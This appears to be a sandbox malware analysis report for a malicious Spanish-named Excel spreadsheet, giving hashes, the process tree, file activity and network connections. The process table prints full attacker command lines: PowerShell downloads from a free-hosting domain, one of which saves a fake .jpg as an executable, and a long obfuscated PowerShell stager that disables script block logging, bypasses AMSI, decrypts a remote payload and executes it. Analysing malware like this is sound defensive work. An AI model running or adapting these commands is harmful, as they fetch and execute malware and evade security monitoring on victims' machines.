File name: | CotizacionGASLP_2.xls |
Full analysis: | https://app.any.run/tasks/f6e6dabc-101c-4ea1-9b91-585d9391f612 |
Verdict: | Malicious activity |
Analysis date: | April 24, 2019, 04:40:15 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/vnd.ms-excel |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.3, Code page: 1252, Author: Gear Capitan, Last Saved By: Pentesting, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Mar 8 07:16:16 2019, Last Saved Time/Date: Fri Mar 8 08:30:22 2019, Security: 0 |
MD5: | 11D675434F9AF160C74D43D9D2020EB9 |
SHA1: | F9D702DCE12B7FC6245F538C9CF7AFD0122C38E7 |
SHA256: | 0B842EBEB65D74BDFD4E0D04DD9DABB2D3DAC70E7F5471FB8FBABC60368B2868 |
SSDEEP: | 6144:DP+SKa85Y11//fs5cClfZw2gmVXqAMQO1WPz8aCLnhlO/QxexGFsiVjpLS:z12oRhYIV1S |
.xls | | | Microsoft Excel sheet (48) |
---|---|---|
.xls | | | Microsoft Excel sheet (alternate) (39.2) |
CompObjUserType: | Hoja de c?lculo de Microsoft Excel 2003 |
---|---|
CompObjUserTypeLen: | 40 |
HeadingPairs: |
|
TitleOfParts: | START |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
Company: | - |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
ModifyDate: | 2019:03:08 08:30:22 |
CreateDate: | 2019:03:08 07:16:16 |
Software: | Microsoft Excel |
LastModifiedBy: | Pentesting |
Author: | Gear Capitan |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2304 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Version: 14.0.6024.1000 | ||||
3612 | "C:\Windows\System32\WScript.exe" "C:\Users\Public\Af.vbs" | C:\Windows\System32\WScript.exe | — | EXCEL.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.8.7600.16385 | ||||
344 | cmd /c ""C:\Users\Public\Af2.bat" " | C:\Windows\System32\cmd.exe | — | WScript.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
1928 | powershell.exe -c (new-object System.Net.WebClient).DownloadFile('https://zeroratchet.000webhostapp.com/vbs.vbs','C:\Users\Public\vbs.vbs'); | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2140 | "C:\Windows\System32\WScript.exe" "C:\Users\Public\vbs.vbs" | C:\Windows\System32\WScript.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.8.7600.16385 | ||||
2292 | "C:\WIndOWs\sySTeM32\CmD.EXe" /CPoWeRSHELL -wINDoWstY HiDD -NoprOf -ExECutiONpolicy byPasS -Noexit -NoNinTeRact " ${F`La5} = [TypE](\"{13}{5}{8}{10}{7}{14}{1}{9}{0}{2}{12}{11}{3}{4}{6}\"-f'RING','TionA',',S','T','EM.oBje','l','cT','E','lECTIOn','rY[St','S.gEn','S','Y','cO','riC.DIC') ; Set (\"{0}{1}\"-f 'iR','f') ([TYPe](\"{0}{1}{3}{2}\"-F'Scr','iPTbL','k','Oc') ) ; sV (\"{1}{0}\" -f'Yi6j','tC') ( [TYpe](\"{0}{1}\"-F 'r','Ef')) ; sEt-iTEM ('v'+'aR'+'ia'+'BLE:1S4d'+'c') ([tYPE](\"{5}{3}{0}{4}{2}{1}\"-F'e','tMANaGer','iCEpOiN','yST','m.NET.SeRV','S') ); sET-iteM (\"{2}{4}{3}{0}{1}\"-f'l','E:6sJGf','vA','Ab','ri') ( [tYpE](\"{0}{4}{3}{1}{2}\"-F 'SYSteM','rEq','UEst','net.web','.')); sET (\"Bz\"+\"3mN\") ( [TypE](\"{1}{3}{2}{4}{0}\"-f'tIalCaChe','SYsTEM.NeT','DE','.CrE','n') ) ; sEt-itEM (\"{3}{1}{4}{2}{0}\"-f'kM','a','lE:V0','V','RIaB') ( [tYPE](\"{5}{1}{3}{2}{4}{0}\"-F 'ding','y','.T','STeM','exT.ENCO','S') ) ; ${b`d`4Q6} = [typE](\"{0}{1}{2}\"-F 'TExt.enc','ODin','g') ; ${P9T`YA}= [TYpE](\"{1}{0}\"-F 'nveRT','cO'); IF(${p`SvErsI`o`NtaBlE}.\"PsVE`RsIOn\".\"Ma`Jor\" -ge 3){${9`F3}= ${TC`yi6j}.\"AsSemb`lY\".(\"{0}{1}\" -f 'GeTTy','pE').Invoke((\"{3}{0}{4}{5}{2}{1}\" -f 'ystem.','ation.Utils','tom','S','Manageme','nt.Au')).\"GeTFIE`lD\"((\"{0}{2}{1}{4}{3}{6}{5}\" -f'cach','dG','e','oupPoli','r','ttings','cySe'),'N'+(\"{0}{1}{2}\"-f'o','nPublic,','Static'));If(${9`F3}){${0`5f}=${9`F3}.(\"{1}{0}\" -f'ue','GEtVaL').Invoke(${n`ULl});If(${0`5F}[(\"{0}{1}\"-f 'Scri','ptB')+(\"{1}{2}{0}{3}\"-f 'ggin','loc','kLo','g')]){${0`5F}[(\"{0}{2}{1}\" -f'S','iptB','cr')+(\"{2}{1}{0}{3}\" -f'gi','og','lockL','ng')][(\"{2}{0}{1}{3}\"-f 'nable','Scrip','E','tB')+(\"{2}{3}{1}{0}\"-f'ing','Logg','loc','k')]=0;${0`5F}[(\"{2}{1}{0}\" -f 'riptB','c','S')+(\"{0}{2}{1}\"-f'lockLoggi','g','n')][(\"{7}{1}{0}{10}{2}{3}{4}{5}{8}{6}{9}\"-f 'l','b','cri','ptBl','ockInv','oc','tionL','Ena','a','ogging','eS')]=0}${v`Al}= ( GET-chIldItEM (\"VArIable:\"+\"fl\"+\"A5\")).\"V`Alue\"::(\"{1}{0}\"-f'Ew','N').Invoke();${V`Al}.(\"{1}{0}\"-f 'd','Ad').Invoke((\"{3}{1}{0}{2}\"-f 'leScrip','nab','tB','E')+(\"{0}{1}{2}\"-f 'lockL','og','ging'),0);${v`AL}.(\"{1}{0}\" -f 'd','Ad').Invoke((\"{3}{0}{1}{4}{5}{6}{2}\"-f 'nableScriptBloc','kI','g','E','nvocat','ionLoggi','n'),0);${0`5F}[(((\"{11}{12}{23}{14}{16}{1}{2}{21}{17}{19}{15}{7}{8}{9}{4}{5}{6}{10}{3}{22}{20}{0}{13}{18}\"-f'cri','m','1','ShellI','Im1','Po','w','o','softIm1','Windows','er','H','KEY','pt','1Sof','Micr','twareI','icies','B','Im1','S','Pol','m1','_LOCAL_MACHINEIm')) -replace ([Char]73+[Char]109+[Char]49),[Char]92)+(\"{0}{2}{1}\"-f 'lockLo','ing','gg')]=${v`AL}}ELSE{ ( GET-varIaBLE (\"{1}{0}\" -f 'F','Ir') -vALUEOnLy ).\"GEtFie`lD\"((\"{1}{2}{0}\" -f'gnatures','s','i'),'N'+(\"{2}{3}{0}{1}{4}\" -f'St','a','on','Public,','tic')).(\"{1}{0}\"-f 'Ue','SEtVaL').Invoke(${nU`LL},(.(\"{2}{1}{0}\" -f 'T','W-OBjeC','Ne') (\"{1}{2}{3}{5}{4}{6}{0}\"-f']','C','ollEC','tI','sTR','OnS.GeneRiC.HAShSeT[','INg')))}${r`EF}= ${T`c`YI6j}.\"A`sSeM`Bly\".(\"{0}{1}\" -f'Ge','TTyPE').Invoke((\"{6}{9}{1}{2}{5}{8}{10}{0}{7}{4}{3}\"-f'o','.M','anagem','iUtils','s','e','Sy','n.Am','nt.Autom','stem','ati'));${r`EF}.(\"{0}{1}\" -f'G','etFIeLD').Invoke((\"{3}{2}{1}{4}{0}\" -f 'ed','siI','m','a','nitFail'),(\"{4}{2}{1}{0}{3}\" -f'Sta','blic,','nPu','tic','No')).(\"{1}{0}{2}\"-f 'VALu','SeT','e').Invoke(${nU`LL},${t`RUe});}; ( Get-vARiaBlE ('1'+'s4dc') ).\"VA`Lue\"::\"EXP`EcT`100`CoNTI`Nue\"=0;${1`77}=.(\"{0}{1}{3}{2}\"-f'N','Ew-O','T','bJEC') (\"{2}{3}{4}{1}{0}\" -f'IEnt','NeT.WEbCl','SY','s','teM.');${U}=(\"{14}{2}{4}{6}{8}{10}{5}{12}{9}{7}{0}{13}{1}{11}{3}\" -f'/7','0; rv','l','ecko','la/5','i','.0 (Windows','t',' NT 6.1; WOW','en','64; Tr',':11.0) like G','d','.','Mozi');${1`77}.\"HEa`d`ErS\".(\"{0}{1}\" -f 'Ad','d').Invoke((\"{1}{0}{2}\"-f 'ser-Age','U','nt'),${U});${1`77}.\"hEa`D`ErS\".(\"{1}{0}\" -f'dD','A').Invoke((\"{1}{2}{0}\"-f 'ent','User-A','g'),${U});${1`77}.\"Pr`oxy\"= (VAriAbLe (\"{0}{1}\" -f'6SJ','GF') -ValU )::\"D`EFaU`L`TWebProxy\";${1`77}.\"PR`oxY\".\"CRE`d`enT`Ials\" = ( iTem ('Va'+'r'+'iAbLe:bZ'+'3mn')).\"val`Ue\"::\"de`FaultNetW`OrkCRED`enTI`AlS\";${sC`RipT:pR`OxY} = ${1`77}.\"Pr`oxY\";${k}= ( geT-ITEm (\"{1}{3}{0}{2}\"-f'ABLE:v','Va','0Km','ri')).\"Va`Lue\"::\"AS`cii\".(\"{0}{2}{1}\"-f'G','Ytes','ETB').Invoke((\"{0}{4}{6}{1}{7}{8}{9}{2}{5}{3}\"-f '75','cf520b0','1ec9','36ff','d2','2','9c','5d','7','ec49a5c'));${r}={${D},${K}=${aR`Gs};${S}=0..255;0..255|&('%'){${j}=(${J}+${s}[${_}]+${k}[${_}%${k}.\"CO`Unt\"])%256;${s}[${_}],${S}[${J}]=${S}[${j}],${s}[${_}]};${d}|.('%'){${I}=(${I}+1)%256;${H}=(${H}+${s}[${i}])%256;${s}[${i}],${S}[${h}]=${s}[${H}],${s}[${i}];${_}-bXor${s}[(${s}[${i}]+${S}[${H}])%256]}};${s`ER}=$( ( gET-vArIaBLE (\"{1}{0}\" -f '6','Bd4Q') -VaL)::\"Un`IC`oDe\".\"g`etS`TrIng\"( ${P`9TyA}::(\"{2}{3}{0}{1}\"-f 'n','g','F','romBaSe64STRi').Invoke((\"{22}{3}{21}{27}{25}{24}{17}{12}{14}{0}{8}{2}{19}{11}{13}{18}{4}{10}{23}{16}{20}{15}{7}{26}{5}{6}{9}{1}\" -f'wByAG8','YA','wB','B0A','AG','8AcgBnADoAN','gA2A','zA','Ac','D','QAbwB','AGYA','C8ALwBtAG','dAA','kAY','AB','BvAGE','A','t','v','AZ','HQ','aA','3AG4AbA','6','AA','C4AZAB1AGMAawBkAG4AcwAuAG','Ac'))));${t}=(\"{1}{0}{2}\"-f 'adm','/','in/get.php');${1`77}.\"h`eadErs\".(\"{1}{0}\" -f 'D','AD').Invoke((\"{0}{1}\"-f'C','ookie'),(\"{3}{5}{2}{7}{1}{0}{8}{4}{6}\"-f'p','Pb','n6','hPrUMXGP','k','wGicOf=xY','ngeU=','1t','RKZcG36w6K4m0'));${D`AtA}=${1`77}.(\"{2}{3}{0}{1}\"-f'nloaDDAT','A','Do','w').Invoke(${S`er}+${T});${iV}=${d`ATA}[0..3];${DA`Ta}=${DA`TA}[4..${dA`TA}.\"Le`N`GTH\"];-JOiN[ChaR[]](& ${R} ${d`Ata} (${i`V}+${k}))|&(\"{1}{0}\" -f 'X','IE')" | C:\WIndOWs\sySTeM32\CmD.EXe | — | WScript.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 4294770688 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
1356 | PoWeRSHELL -wINDoWstY HiDD -NoprOf -ExECutiONpolicy byPasS -Noexit -NoNinTeRact " ${F`La5} = [TypE](\"{13}{5}{8}{10}{7}{14}{1}{9}{0}{2}{12}{11}{3}{4}{6}\"-f'RING','TionA',',S','T','EM.oBje','l','cT','E','lECTIOn','rY[St','S.gEn','S','Y','cO','riC.DIC') ; Set (\"{0}{1}\"-f 'iR','f') ([TYPe](\"{0}{1}{3}{2}\"-F'Scr','iPTbL','k','Oc') ) ; sV (\"{1}{0}\" -f'Yi6j','tC') ( [TYpe](\"{0}{1}\"-F 'r','Ef')) ; sEt-iTEM ('v'+'aR'+'ia'+'BLE:1S4d'+'c') ([tYPE](\"{5}{3}{0}{4}{2}{1}\"-F'e','tMANaGer','iCEpOiN','yST','m.NET.SeRV','S') ); sET-iteM (\"{2}{4}{3}{0}{1}\"-f'l','E:6sJGf','vA','Ab','ri') ( [tYpE](\"{0}{4}{3}{1}{2}\"-F 'SYSteM','rEq','UEst','net.web','.')); sET (\"Bz\"+\"3mN\") ( [TypE](\"{1}{3}{2}{4}{0}\"-f'tIalCaChe','SYsTEM.NeT','DE','.CrE','n') ) ; sEt-itEM (\"{3}{1}{4}{2}{0}\"-f'kM','a','lE:V0','V','RIaB') ( [tYPE](\"{5}{1}{3}{2}{4}{0}\"-F 'ding','y','.T','STeM','exT.ENCO','S') ) ; ${b`d`4Q6} = [typE](\"{0}{1}{2}\"-F 'TExt.enc','ODin','g') ; ${P9T`YA}= [TYpE](\"{1}{0}\"-F 'nveRT','cO'); IF(${p`SvErsI`o`NtaBlE}.\"PsVE`RsIOn\".\"Ma`Jor\" -ge 3){${9`F3}= ${TC`yi6j}.\"AsSemb`lY\".(\"{0}{1}\" -f 'GeTTy','pE').Invoke((\"{3}{0}{4}{5}{2}{1}\" -f 'ystem.','ation.Utils','tom','S','Manageme','nt.Au')).\"GeTFIE`lD\"((\"{0}{2}{1}{4}{3}{6}{5}\" -f'cach','dG','e','oupPoli','r','ttings','cySe'),'N'+(\"{0}{1}{2}\"-f'o','nPublic,','Static'));If(${9`F3}){${0`5f}=${9`F3}.(\"{1}{0}\" -f'ue','GEtVaL').Invoke(${n`ULl});If(${0`5F}[(\"{0}{1}\"-f 'Scri','ptB')+(\"{1}{2}{0}{3}\"-f 'ggin','loc','kLo','g')]){${0`5F}[(\"{0}{2}{1}\" -f'S','iptB','cr')+(\"{2}{1}{0}{3}\" -f'gi','og','lockL','ng')][(\"{2}{0}{1}{3}\"-f 'nable','Scrip','E','tB')+(\"{2}{3}{1}{0}\"-f'ing','Logg','loc','k')]=0;${0`5F}[(\"{2}{1}{0}\" -f 'riptB','c','S')+(\"{0}{2}{1}\"-f'lockLoggi','g','n')][(\"{7}{1}{0}{10}{2}{3}{4}{5}{8}{6}{9}\"-f 'l','b','cri','ptBl','ockInv','oc','tionL','Ena','a','ogging','eS')]=0}${v`Al}= ( GET-chIldItEM (\"VArIable:\"+\"fl\"+\"A5\")).\"V`Alue\"::(\"{1}{0}\"-f'Ew','N').Invoke();${V`Al}.(\"{1}{0}\"-f 'd','Ad').Invoke((\"{3}{1}{0}{2}\"-f 'leScrip','nab','tB','E')+(\"{0}{1}{2}\"-f 'lockL','og','ging'),0);${v`AL}.(\"{1}{0}\" -f 'd','Ad').Invoke((\"{3}{0}{1}{4}{5}{6}{2}\"-f 'nableScriptBloc','kI','g','E','nvocat','ionLoggi','n'),0);${0`5F}[(((\"{11}{12}{23}{14}{16}{1}{2}{21}{17}{19}{15}{7}{8}{9}{4}{5}{6}{10}{3}{22}{20}{0}{13}{18}\"-f'cri','m','1','ShellI','Im1','Po','w','o','softIm1','Windows','er','H','KEY','pt','1Sof','Micr','twareI','icies','B','Im1','S','Pol','m1','_LOCAL_MACHINEIm')) -replace ([Char]73+[Char]109+[Char]49),[Char]92)+(\"{0}{2}{1}\"-f 'lockLo','ing','gg')]=${v`AL}}ELSE{ ( GET-varIaBLE (\"{1}{0}\" -f 'F','Ir') -vALUEOnLy ).\"GEtFie`lD\"((\"{1}{2}{0}\" -f'gnatures','s','i'),'N'+(\"{2}{3}{0}{1}{4}\" -f'St','a','on','Public,','tic')).(\"{1}{0}\"-f 'Ue','SEtVaL').Invoke(${nU`LL},(.(\"{2}{1}{0}\" -f 'T','W-OBjeC','Ne') (\"{1}{2}{3}{5}{4}{6}{0}\"-f']','C','ollEC','tI','sTR','OnS.GeneRiC.HAShSeT[','INg')))}${r`EF}= ${T`c`YI6j}.\"A`sSeM`Bly\".(\"{0}{1}\" -f'Ge','TTyPE').Invoke((\"{6}{9}{1}{2}{5}{8}{10}{0}{7}{4}{3}\"-f'o','.M','anagem','iUtils','s','e','Sy','n.Am','nt.Autom','stem','ati'));${r`EF}.(\"{0}{1}\" -f'G','etFIeLD').Invoke((\"{3}{2}{1}{4}{0}\" -f 'ed','siI','m','a','nitFail'),(\"{4}{2}{1}{0}{3}\" -f'Sta','blic,','nPu','tic','No')).(\"{1}{0}{2}\"-f 'VALu','SeT','e').Invoke(${nU`LL},${t`RUe});}; ( Get-vARiaBlE ('1'+'s4dc') ).\"VA`Lue\"::\"EXP`EcT`100`CoNTI`Nue\"=0;${1`77}=.(\"{0}{1}{3}{2}\"-f'N','Ew-O','T','bJEC') (\"{2}{3}{4}{1}{0}\" -f'IEnt','NeT.WEbCl','SY','s','teM.');${U}=(\"{14}{2}{4}{6}{8}{10}{5}{12}{9}{7}{0}{13}{1}{11}{3}\" -f'/7','0; rv','l','ecko','la/5','i','.0 (Windows','t',' NT 6.1; WOW','en','64; Tr',':11.0) like G','d','.','Mozi');${1`77}.\"HEa`d`ErS\".(\"{0}{1}\" -f 'Ad','d').Invoke((\"{1}{0}{2}\"-f 'ser-Age','U','nt'),${U});${1`77}.\"hEa`D`ErS\".(\"{1}{0}\" -f'dD','A').Invoke((\"{1}{2}{0}\"-f 'ent','User-A','g'),${U});${1`77}.\"Pr`oxy\"= (VAriAbLe (\"{0}{1}\" -f'6SJ','GF') -ValU )::\"D`EFaU`L`TWebProxy\";${1`77}.\"PR`oxY\".\"CRE`d`enT`Ials\" = ( iTem ('Va'+'r'+'iAbLe:bZ'+'3mn')).\"val`Ue\"::\"de`FaultNetW`OrkCRED`enTI`AlS\";${sC`RipT:pR`OxY} = ${1`77}.\"Pr`oxY\";${k}= ( geT-ITEm (\"{1}{3}{0}{2}\"-f'ABLE:v','Va','0Km','ri')).\"Va`Lue\"::\"AS`cii\".(\"{0}{2}{1}\"-f'G','Ytes','ETB').Invoke((\"{0}{4}{6}{1}{7}{8}{9}{2}{5}{3}\"-f '75','cf520b0','1ec9','36ff','d2','2','9c','5d','7','ec49a5c'));${r}={${D},${K}=${aR`Gs};${S}=0..255;0..255|&('%'){${j}=(${J}+${s}[${_}]+${k}[${_}%${k}.\"CO`Unt\"])%256;${s}[${_}],${S}[${J}]=${S}[${j}],${s}[${_}]};${d}|.('%'){${I}=(${I}+1)%256;${H}=(${H}+${s}[${i}])%256;${s}[${i}],${S}[${h}]=${s}[${H}],${s}[${i}];${_}-bXor${s}[(${s}[${i}]+${S}[${H}])%256]}};${s`ER}=$( ( gET-vArIaBLE (\"{1}{0}\" -f '6','Bd4Q') -VaL)::\"Un`IC`oDe\".\"g`etS`TrIng\"( ${P`9TyA}::(\"{2}{3}{0}{1}\"-f 'n','g','F','romBaSe64STRi').Invoke((\"{22}{3}{21}{27}{25}{24}{17}{12}{14}{0}{8}{2}{19}{11}{13}{18}{4}{10}{23}{16}{20}{15}{7}{26}{5}{6}{9}{1}\" -f'wByAG8','YA','wB','B0A','AG','8AcgBnADoAN','gA2A','zA','Ac','D','QAbwB','AGYA','C8ALwBtAG','dAA','kAY','AB','BvAGE','A','t','v','AZ','HQ','aA','3AG4AbA','6','AA','C4AZAB1AGMAawBkAG4AcwAuAG','Ac'))));${t}=(\"{1}{0}{2}\"-f 'adm','/','in/get.php');${1`77}.\"h`eadErs\".(\"{1}{0}\" -f 'D','AD').Invoke((\"{0}{1}\"-f'C','ookie'),(\"{3}{5}{2}{7}{1}{0}{8}{4}{6}\"-f'p','Pb','n6','hPrUMXGP','k','wGicOf=xY','ngeU=','1t','RKZcG36w6K4m0'));${D`AtA}=${1`77}.(\"{2}{3}{0}{1}\"-f'nloaDDAT','A','Do','w').Invoke(${S`er}+${T});${iV}=${d`ATA}[0..3];${DA`Ta}=${DA`TA}[4..${dA`TA}.\"Le`N`GTH\"];-JOiN[ChaR[]](& ${R} ${d`Ata} (${i`V}+${k}))|&(\"{1}{0}\" -f 'X','IE')" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | CmD.EXe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 4294770688 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
1424 | "C:\Windows\System32\cmd.exe" /c C:\Users\Public\Af.bat | C:\Windows\System32\cmd.exe | WScript.exe | |
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3876 | powershell.exe -c (new-object System.Net.WebClient).DownloadFile('https://zeroratchet.000webhostapp.com/OfficeUpdate.jpg','C:\Users\Public\OfficeUpdate.exe'); | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3216 | timeout 5 | C:\Windows\system32\timeout.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: timeout - pauses command processing Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2304 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVR6DB9.tmp.cvr | — | |
MD5:— | SHA256:— | |||
1928 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\LJ07I1ZEKUCZH610GJX4.temp | — | |
MD5:— | SHA256:— | |||
1928 | powershell.exe | C:\Users\admin\AppData\Local\Temp\Cab82F7.tmp | — | |
MD5:— | SHA256:— | |||
1928 | powershell.exe | C:\Users\admin\AppData\Local\Temp\Tar82F8.tmp | — | |
MD5:— | SHA256:— | |||
1928 | powershell.exe | C:\Users\admin\AppData\Local\Temp\Cab8308.tmp | — | |
MD5:— | SHA256:— | |||
1928 | powershell.exe | C:\Users\admin\AppData\Local\Temp\Tar8309.tmp | — | |
MD5:— | SHA256:— | |||
1928 | powershell.exe | C:\Users\admin\AppData\Local\Temp\Cab8404.tmp | — | |
MD5:— | SHA256:— | |||
1928 | powershell.exe | C:\Users\admin\AppData\Local\Temp\Tar8405.tmp | — | |
MD5:— | SHA256:— | |||
1356 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\YG6XLSES8AESX4LOWABG.temp | — | |
MD5:— | SHA256:— | |||
3876 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\7QOV3DOAK1R47G58QRPV.temp | — | |
MD5:— | SHA256:— |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
1928 | powershell.exe | GET | 200 | 93.184.221.240:80 | http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab | US | compressed | 55.6 Kb | whitelisted |
1928 | powershell.exe | GET | 200 | 93.184.221.240:80 | http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/DF3C24F9BFD666761B268073FE06D1CC8D4F82A4.crt | US | der | 914 b | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3876 | powershell.exe | 145.14.144.7:443 | zeroratchet.000webhostapp.com | Hostinger International Limited | US | shared |
1928 | powershell.exe | 145.14.144.7:443 | zeroratchet.000webhostapp.com | Hostinger International Limited | US | shared |
1928 | powershell.exe | 93.184.221.240:80 | www.download.windowsupdate.com | MCI Communications Services, Inc. d/b/a Verizon Business | US | whitelisted |
Domain | IP | Reputation |
---|---|---|
zeroratchet.000webhostapp.com |
| shared |
www.download.windowsupdate.com |
| whitelisted |
PID | Process | Class | Message |
---|---|---|---|
— | — | Not Suspicious Traffic | ET INFO Observed Free Hosting Domain (*.000webhostapp .com in DNS Lookup) |
1928 | powershell.exe | Not Suspicious Traffic | ET INFO Observed SSL Cert for Free Hosting Domain (*.000webhostapp .com) |
3876 | powershell.exe | Not Suspicious Traffic | ET INFO Observed SSL Cert for Free Hosting Domain (*.000webhostapp .com) |